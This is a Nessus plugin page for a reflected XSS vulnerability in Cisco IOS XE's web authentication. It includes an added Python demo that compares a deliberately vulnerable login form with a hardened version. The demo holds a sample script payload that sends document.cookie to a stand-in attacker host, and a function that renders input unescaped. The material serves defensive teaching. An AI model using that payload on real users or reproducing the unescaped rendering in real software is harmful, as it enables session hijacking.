Cisco IOS XE Software Web UI Reflected XSS (cisco-sa-webui-xss-VWyDgjOU)

medium Nessus Plugin ID 272739

Synopsis

A vulnerability in the Web Authentication feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to conduct a reflected cross-site scripting (XSS) attack against users of an affected device's web UI.

Description

According to its self-reported version, the Cisco IOS XE Software running on the remote device is affected by a reflected cross-site scripting (XSS) vulnerability in its Web Authentication feature.
An attacker could exploit this vulnerability by persuading a user of the web UI to click a malicious link. A successful exploit could allow the attacker to execute script in that user's browser session with the affected device and steal the user's cookies. Note that this is a version-based check; the plugin does not test the web UI itself.

Please see the included Cisco bug IDs and Cisco Security Advisory for more information.
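The attack chain described above (malicious link, parameter reflected into the page, script reads the session cookie) is generic to reflected XSS. The following is an added, illustrative example and is not Cisco's code; it models a captive-portal style login page that echoes a request parameter into its HTML. The parameter name `redirect_url`, the hostnames and the page layout are assumptions made for this example, not details of the Cisco Web Authentication feature. It shows the vulnerable renderer beside a hardened one (output encoding plus a redirect allowlist) and a session cookie set with HttpOnly so that `document.cookie` cannot read it even if another injection is found.

```python
"""
Reflected-XSS demo: vulnerable vs. hardened page rendering (added example,
not Cisco code). Parameter name, hosts and markup are assumptions.
"""
from html import escape
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed sample payload and link: the kind of URL an attacker would send
# to a victim. Hosts use the reserved .invalid TLD and are placeholders.
PAYLOAD = '"><script>fetch("https://attacker.example.invalid/?c="+document.cookie)</script>'
MALICIOUS_LINK = "https://portal.example.invalid/login?" + urlencode({"redirect_url": PAYLOAD})


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter, decoded as a browser would."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get(name, [""])[0]


def render_login_vulnerable(redirect_url: str) -> str:
    """Deliberately vulnerable: untrusted input written into an attribute unescaped.

    The payload's leading double quote closes the value attribute and the
    rest of the string becomes live markup in the served page.
    """
    return (
        '<form method="post" action="/login">'
        f'<input type="hidden" name="redirect_url" value="{redirect_url}">'
        '<input name="user"><input name="pass" type="password">'
        "</form>"
    )


def is_safe_redirect(value: str) -> bool:
    """Allowlist for the post-login target: a same-origin absolute path only.

    Rejects scheme/host forms, protocol-relative (//) and /\\ forms, and any
    control characters. This closes the open-redirect half of the problem;
    encoding in render_login_fixed closes the XSS half.
    """
    return (
        value.startswith("/")
        and not value.startswith("//")
        and not value.startswith("/\\")
        and all(ch.isprintable() for ch in value)
    )


def render_login_fixed(redirect_url: str) -> str:
    """Hardened: validate the value, then HTML-encode it for the attribute context."""
    target = redirect_url if is_safe_redirect(redirect_url) else "/"
    return (
        '<form method="post" action="/login">'
        f'<input type="hidden" name="redirect_url" value="{escape(target, quote=True)}">'
        '<input name="user"><input name="pass" type="password">'
        "</form>"
    )


def contains_injected_script(page: str) -> bool:
    """Crude stand-in for a browser: true if a live <script tag was injected.

    Encoded output contains "&lt;script", which does not match.
    """
    return "<script" in page.lower()


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session: HttpOnly keeps it out of document.cookie,
    Secure keeps it off plaintext HTTP, SameSite=Strict limits cross-site sends."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Strict"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


if __name__ == "__main__":
    reflected = query_param(MALICIOUS_LINK, "redirect_url")
    print("vulnerable page injected:", contains_injected_script(render_login_vulnerable(reflected)))
    print("fixed page injected:     ", contains_injected_script(render_login_fixed(reflected)))
    print("Set-Cookie:", session_cookie_header("constructed-session-id"))
```

Output encoding at the point of insertion is the fix for the XSS itself; the redirect allowlist and the HttpOnly/Secure/SameSite cookie attributes are defence in depth that limit what the "steal user cookies" step can achieve if another reflection is found later.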

Solution

Upgrade to the relevant fixed version referenced in Cisco bug ID CSCwm57073.

See Also

http://www.nessus.org/u?482d14dd

http://www.nessus.org/u?acad5d9e

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwm57073

Plugin Details

Severity: Medium

ID: 272739

File Name: cisco-sa-webui-xss-VWyDgjOU-iosxe.nasl

Version: 1.1

Type: combined

Family: CISCO

Published: 11/5/2025

Updated: 11/5/2025

Supported Sensors: Nessus

Risk Information

VPR

Risk Factor: Low

Score: 3.8

CVSS v2

Risk Factor: Medium

Base Score: 6.4

Temporal Score: 4.7

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N

CVSS Score Source: CVE-2025-20240

CVSS v3

Risk Factor: Medium

Base Score: 6.1

Temporal Score: 5.3

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Temporal Vector: CVSS:3.0/E:U/RL:O/RC:C

Vulnerability Information

CPE: cpe:/o:cisco:ios_xe

Required KB Items: Host/Cisco/IOS-XE/Version

Exploit Ease: No known exploits are available

Patch Publication Date: 9/24/2025

Vulnerability Publication Date: 9/24/2025

Reference Information

CVE: CVE-2025-20240

CWE: 692

CISCO-SA: cisco-sa-webui-xss-VWyDgjOU

IAVA: 2025-A-0701

CISCO-BUG-ID: CSCwm57073